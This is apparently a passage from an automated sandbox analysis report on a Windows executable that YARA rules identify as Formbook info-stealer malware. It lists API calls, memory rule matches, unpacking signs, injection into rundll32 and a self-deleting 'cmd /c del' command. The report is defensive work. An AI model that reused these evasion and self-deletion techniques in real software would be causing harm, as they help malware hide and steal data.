          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A49760 NtOpenProcess,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A49770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A4A770 NtOpenThread,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_1_004181B0 NtCreateFile,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_1_00418260 NtReadFile,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_1_004182E0 NtClose,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_1_00418390 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_1_0041825A NtReadFile,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_1_004182DA NtClose,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_1_0041838B NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04649540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046495D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04649660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04649650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046496E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046496D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04649710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04649FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04649780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04649860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04649840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04649910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046499A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04649A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04649560 NtWriteFile,
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04649520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0464AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046495F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04649670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04649610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04649760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0464A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04649770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04649730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0464A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046497A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0464B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04649820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046498F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046498A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04649950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046499D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04649A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04649A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04649A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04649A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04649B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0464A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_02BB82E0 NtClose,
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_02BB8260 NtReadFile,
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_02BB8390 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_02BB81B0 NtCreateFile,
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_02BB82DA NtClose,
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_02BB825A NtReadFile,
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_02BB838B NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 0_2_0040314A EntryPoint,#17,OleInitialize,SHGetFileInfoA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,GetCommandLineA,GetModuleHandleA,CharNextA,OleUninitialize,ExitProcess,lstrcatA,CreateDirectoryA,lstrcatA,lstrcatA,DeleteFileA,GetModuleFileNameA,lstrcmpiA,CopyFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 0_2_004046A7
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00401030
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_0041B8B4
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_0041C1CB
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00401208
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_0041C3FC
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_0041CB99
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00408C4B
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00408C50
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_0041C544
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00402D90
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_0041B611
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00402FB0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A320A0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AD20A8
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A1B090
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AD28EC
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00ADE824
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AC1002
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A24120
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A0F900
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AD22AE
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00ABFA2B
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A3EBB0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AC03DA
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00ACDBD2
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AD2B28
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A1841F
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00ACD466
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A32581
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A1D5E0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AD25DD
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A00D20
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AD2D07
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AD1D55
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AD2EF7
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A26E30
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00ACD616
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AD1FF1
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00ADDFCE
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_1_00401030
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_1_0041B8B4
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_1_0041C1CB
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_1_00401208
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_1_0041C3FC
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_1_0041CB99
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_1_00408C4B
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_1_00408C50
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_1_0041C544
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_1_00402D90
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_1_0041B611
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_1_00402FB0
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046CD466
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0461841F
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046D1D55
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04600D20
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046D2D07
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0461D5E0
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046D25DD
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04632581
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04626E30
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046CD616
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046D2EF7
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046D1FF1
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046DDFCE
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046DE824
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046C1002
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046D28EC
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046320A0
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046D20A8
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0461B090
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04624120
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0460F900
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046D22AE
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046D2B28
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046C03DA
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046CDBD2
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0463EBB0
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_02BBCB99
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_02BBC3FC
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_02BBC1AF
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_02BBC1CB
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_02BA2FB0
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_02BA8C50
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_02BA8C4B
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_02BA2D90
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_02BBC544
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: String function: 00419F60 appears 38 times
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: String function: 00A0B150 appears 45 times
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: String function: 0041A090 appears 40 times
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 0460B150 appears 35 times
          Source: NdBLyH2h5d.exe, 00000000.00000003.211607404.000000001EF66000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs NdBLyH2h5d.exe
          Source: NdBLyH2h5d.exe, 00000001.00000002.252496199.0000000000AFF000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs NdBLyH2h5d.exe
          Source: NdBLyH2h5d.exe, 00000001.00000002.253177072.000000000264C000.00000040.00000001.sdmp Binary or memory string: OriginalFilenameRUNDLL32.EXEj% vs NdBLyH2h5d.exe
          Source: NdBLyH2h5d.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.252981265.0000000000D10000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.252981265.0000000000D10000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.216382055.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.216382055.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.479518416.0000000002BD0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.479518416.0000000002BD0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.477763536.00000000003B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.477763536.00000000003B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.220737400.0000000002640000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.220737400.0000000002640000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.251780001.00000000009B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.251780001.00000000009B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.NdBLyH2h5d.exe.2640000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.NdBLyH2h5d.exe.2640000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.NdBLyH2h5d.exe.2640000.2.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.NdBLyH2h5d.exe.2640000.2.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/3@15/11
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 0_2_004041E5 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 0_2_004020A6 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5988:120:WilError_01
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeFile created: C:\Users\user\AppData\Local\Temp\nsvE791.tmpJump to behavior
          Source: NdBLyH2h5d.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          Source: NdBLyH2h5d.exeVirustotal: Detection: 20%
          Source: NdBLyH2h5d.exeReversingLabs: Detection: 29%
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeFile read: C:\Users\user\Desktop\NdBLyH2h5d.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\NdBLyH2h5d.exe 'C:\Users\user\Desktop\NdBLyH2h5d.exe'
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeProcess created: C:\Users\user\Desktop\NdBLyH2h5d.exe 'C:\Users\user\Desktop\NdBLyH2h5d.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\NdBLyH2h5d.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeProcess created: C:\Users\user\Desktop\NdBLyH2h5d.exe 'C:\Users\user\Desktop\NdBLyH2h5d.exe'
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\NdBLyH2h5d.exe'
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: Binary string: wntdll.pdbUGP source: NdBLyH2h5d.exe, 00000000.00000003.216210756.000000001EFE0000.00000004.00000001.sdmp, NdBLyH2h5d.exe, 00000001.00000002.252496199.0000000000AFF000.00000040.00000001.sdmp, rundll32.exe, 00000006.00000002.481925699.00000000046FF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: NdBLyH2h5d.exe, rundll32.exe
          Source: Binary string: rundll32.pdb source: NdBLyH2h5d.exe, 00000001.00000002.253158543.0000000002640000.00000040.00000001.sdmp
          Source: Binary string: rundll32.pdbGCTL source: NdBLyH2h5d.exe, 00000001.00000002.253158543.0000000002640000.00000040.00000001.sdmp

          Data Obfuscation:

          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Unpacked PE file: 1.2.NdBLyH2h5d.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,
          Source: 6oxdti6l9qd.dll.0.dr | Static PE information: section name: .code
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_0041C8CC push es; ret
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_0041925A push esp; retf
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_0041B3F2 push eax; ret
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_0041B3FB push eax; ret
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_0041B3A5 push eax; ret
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_0041B45C push eax; ret
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A5D0D1 push ecx; ret
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_1_0041C8CC push es; ret
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_1_0041925A push esp; retf
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_1_0041B3F2 push eax; ret
